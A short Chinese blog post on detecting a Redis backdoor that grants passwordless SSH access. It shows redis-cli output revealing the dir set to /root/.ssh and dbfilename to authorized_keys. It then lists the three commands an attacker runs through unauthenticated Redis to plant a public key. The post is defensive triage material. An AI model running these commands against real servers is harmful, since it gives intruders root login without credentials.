Redis写入免密后门排查

2019-01-22 分类：服务器阅读(4807) 评论(0)

排查

127.0.0.1:6379> config get dir
1) "dir"
2) "/root/.ssh"

127.0.0.1:6379> config get dbfilename
1) "dbfilename"
2) "authorized_keys"

原理redis未授权远程访问导致

config set dir /root/.ssh
config set dbfilenameauthorized_keys
set key value

其中value为生成公钥，即可将公钥保存在服务器，使得登录时不需要输入账号与密码。

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com 特别注意：本站所有转载文章言论不代表本站观点！本站所提供的图片等素材，版权归原作者所有，如需使用，请与原作者联系。未经允许不得转载：IDC资讯中心 » Redis写入免密后门排查